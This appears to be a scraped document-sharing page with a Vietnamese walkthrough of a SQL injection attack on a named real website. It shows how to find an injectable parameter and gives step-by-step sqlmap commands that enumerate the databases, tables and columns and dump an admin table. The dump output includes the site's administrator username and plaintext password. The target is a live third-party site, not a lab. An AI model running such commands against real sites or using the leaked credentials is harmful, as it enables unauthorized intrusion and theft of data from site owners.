Upload
hung-tran
View
60
Download
6
Embed Size (px)
Citation preview
SQL INJECTION EXPLOIT
VICTIM: http://www.dkgbd.comTOOLS: SQLMAP (PYTHON)
URL ANALYST:
http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0
http:// PROTOCOLwww.dkgbd.com DOMAINProducts.php RESOURCE?LinkID=11&CompanyID=0 ?PARAMETER1=VALUE1&PARAMETER2=VALUE2
Kiểm tra SQL Injection bằng cách thêm ký tự ‘ sau VALUE :
Ví dụ: http://www.dkgbd.com/Products.php?LinkID=11’&CompanyID=0’
Khi ta thêm ‘ vào từng Value, thì value nào gây ra lỗi trên màn hình như hình dưới sẽ được dùng làm parameter để khai thác. Trong trường hợp này, parameter có tên CompanyID sẽ được chọn để khai thác SQLj.
SQL STRUCTURE ANALYST:
DATABASES -> TABLES -> COLUMNS
Bước 1: Tìm databases
SYNTAX:sqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" --dbs
Figure 1: TA TÌM ĐƯỢC 02 DATABASES
Bước 2: Tìm tablesSYNTAXsqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" -D dkgroup --tables
Figure 2: Tables ta tìm được
Bước 3: Tìm columnsSYNTAX:sqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" -D dkgroup -T spec_admin --columns
Bước 4: Tìm giá trị lưu trữ trên từng columnSYNTAXsqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" -D dkgroup -T spec_admin -columns --dump
Figure 3: PLAINTEXT PASSWORD
Database: dkgroupTable: spec_admin[1 entry]
+--------+---------+---------------+----------------+----+---------------------+--------------------+------------+| Active | AdminID | AdminPassword | Email | ID | LastVisit | Name | SuperAdmin |
+--------+---------+---------------+----------------+----+---------------------+--------------------+------------+| 1 | dkgbd | 19dkgbd | [email protected] | 1 | 2012-03-22 12:39:04 | DK Group Web Admin | 1 |
+--------+---------+---------------+----------------+----+---------------------+--------------------+------------+
BƯỚC 5: VERIFY
Figure 4: FINISH